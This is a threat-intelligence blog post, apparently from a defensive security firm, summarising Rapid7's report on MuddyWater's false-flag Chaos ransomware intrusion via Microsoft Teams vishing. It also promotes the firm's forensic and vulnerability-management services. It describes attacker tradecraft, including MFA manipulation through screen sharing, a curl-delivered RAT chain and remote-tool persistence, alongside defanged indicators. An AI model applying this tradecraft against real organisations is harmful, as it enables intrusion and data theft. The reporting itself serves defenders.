Hacking group using Microsoft Teams to attacks

The Iranian state-sponsored hacking group known as MuddyWater (also as Mango Sandstorm, Seedworm, and Static Kitten) has been implicated in a “false flag” ransomware attack, according to a report from Rapid7. This incident, observed in early 2026, shows increasing sophistication and an attempt to blur attribution by adopting cybercrime tactics.

False Flag Attack and Sophisticated Tactics

The initial attack appeared consistent with a ransomware-as-a-service (RaaS) group operating under the Chaos brand. However, evidence suggests this is a state-backed targeted attack disguised as opportunistic extortion.

Rapid7 highlighted that the campaign was characterized by a “high-touch” social engineering phase through Microsoft Teams. The attackers used interactive screen sharing sessions to:

  • Collect credentials.
  • Manipulate multi-factor authentication (MFA).

Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and establishing long-term persistence using remote management tools like DWAgent.

MuddyWater and the Obscuration of Attribution

The findings indicate an effort by MuddyWater to “muddy” attribution, using increasingly tools available on the cybercrime black market. This change has been documented by several security firms, which have noted the use of tools such as CastleRAT and Tsundere.

This is not the first time MuddyWater has carried out ransomware attacks. In September 2020, they were credited with a campaign against Israeli organizations using the PowGoop loader to deploy a destructive variant of Thanos ransomware. In 2023, Microsoft revealed that the group partnered with DEV-1084 (known as DarkBit) for destructive attacks under the guise of ransomware. More recently, in October 2025, they are believed to have used Qilin ransomware against an Israeli government hospital.

Check Point noted in March that these attackers are likely “Iran-affiliated operators working across the cybercriminal ecosystem, using a brand of criminal ransomware and methods associated with the extortion market, while serving an Iranian strategic objective.”

The Chaos RaaS Group

Chaos is a RaaS group that emerged in early 2025, known for its double extortion model and advertising its affiliate program on underground forums such as RAMP and RehubCom.

Chaos attacks use a combination of:

  • Mail flooding and vishing: Through Teams, often impersonating IT support staff.
  • Remote Access Tools Deployment: Such as Microsoft Quick Assist, to get an initial foothold.

Rapid7 also noted that Chaos has demonstrated triple extortion (threats of DDoS attacks) and even quadruple extortion (threats to contact customers or competitors).

Technical Details of the Intrusion

In the intrusion analyzed by Rapid7, MuddyWater/Chaos initiated external chat requests through Teams to interact with employees and gain initial access through screen sharing sessions. After the compromise, they used compromised user accounts to:

  • Perform reconnaissance.
  • Establish persistence with DWAgent and AnyDesk.
  • Move laterally.
  • Exfiltrate data.

Rescue negotiations were subsequently conducted via email. The attackers ran basic discovery commands, accessed VPN configuration files, and instructed users to enter their credentials into local text files. They also deployed AnyDesk for easy access.

Observed using RDP to download an executable (ms_upd.exe) from an external server (172.86.126[.]208) using the curl utility, which started a multiphase infection chain:

  • ms_upd.exe (aka Stagecomp): Collects system information and communicates with a command and control (C2) server to download next stage payloads (game.exe, WebView2Loader.dll and visualwincomp.txt).
  • game.exe (aka Darkcomp): A custom remote access trojan (RAT) that disguises itself as a legitimate Microsoft WebView2 application, being a trojanized version of the official Microsoft WebView2APISample project.
  • WebView2Loader.dll: A legitimate DLL downloaded by ms_upd.exe, required for embedding web content in Windows applications.
  • visualwincomp.txt: An encrypted configuration used by the RAT to obtain information from the C2.

The RAT connects to the C2 server and polls new commands every 60 seconds, allowing the execution of PowerShell commands or scripts, file operations, and the creation of an interactive cmd.exe or PowerShell shell.

The attribution to MuddyWater is derived from the use of a code signing certificate associated with “Donald Gay” to sign ms_upd.exe. This certificate has previously been used by the group to sign their malware, including a CastleLoader downloader called Fakeset.

Other Iranian Nexus Attacks

This development coincides with other reports on Iranian operations:

  • Hunt.io: Revealed an Iranian nexus operation targeting Omani government institutions, exfiltrating over 26,000 Ministry of Justice user records, court case data, and SAM and SYSTEM registry hives. An open directory was found at 172.86.76[.]127.
  • Handala Hack: A pro-Iran hacktivist group that claims to have published details of nearly 400 US Navy service members in the Persian Gulf and to have attacked the Port of Fujairah in the United Arab Emirates, exfiltrating some 11,000 sensitive documents.

Sergey Shykevich of Check Point Research warned of the escalation of Iranian cyber operations and the explicit connection between the cyber and kinetic domains, suggesting that stolen port infrastructure data could be used for physical missile targeting.

Conclusions

The growing convergence between state-sponsored intrusion activity and cybercrime tactics, such as the use of RaaS frameworks, allows actors like MuddyWater to blur distinctions and complicate attribution. This diverts defense efforts toward the immediate impact, delaying the identification of underlying persistence mechanisms. The absence of file encryption, despite ransomware artifacts, suggests that the ransomware component primarily serves as a facilitation or obfuscation mechanism, rather than being the primary target of the intrusion.

Confidence

What would we do in these cases?

Defensive Cybersecurity | Protection and Response to Threats - Comfidentia

Defensive cybersecurity services: digital forensics, secure software development, vulnerability management, threat intelligence and incident response. Protect your networks and servers with our defensive security solutions.

Protect your business from digital threats with Defensive Cybersecurity from Comfidentia. Our comprehensive services provide you with robust protection against cyberattacks, helping you ensure the security of your sensitive data.

Forensic Analysis

Discover the truth hidden in the data with our Forensic Analysis service. We collect, examine and thoroughly analyze every digital trace to reveal the root cause of any incident. Our team of experts follows the key steps: Identification, Acquisition, Analysis and Presentation of solid evidence. Don’t waste any more time searching for answers, trust our experience to reveal the evidence you need.

Vulnerability Management

Don’t risk the security of your company! With our Vulnerability Management solutions, you won’t just get a simple scan or risk assessment, but a complete assessment together with your team. Our approach goes further by proposing real and lasting solutions, adapted to the specific capabilities and needs of your business and systems.

Protect your Brand from Cyber ​​Threats

Protect your business today with Brand Intelligence! Our specialized service provides you with valuable information about possible malicious actors trying to impersonate your brand or domain. By detecting these threats, you can take quick and effective measures to safeguard your company’s reputation. Don’t let cybercriminals damage your image, trust Brand Intelligence to keep your business safe at all times.

Secure Software Development

With our specialized tools and skills, you can create vulnerability-proof applications and programs from start to finish. Our approach is based on a robust model that includes secure design, development process, vulnerability management and information security. This ensures that your software is protected at every stage of the process. Source: See more at Comfidentia

Other related pages:

Schedule a presentation with Comfidentia

References

Original source: See original article

*Rapid7

  • The Hacker News
  • Ctrl-Alt-Intel *Broadcom *Check Point
  • JUMPSEC *Hunt.io *Microsoft Teams *Microsoft Quick Assist
  • DWAgent
  • AnyDesk
  • IP: 172.86.126[.]208
  • IP: 172.86.76[.]127
  • Code Signing Certificate: Donald Gay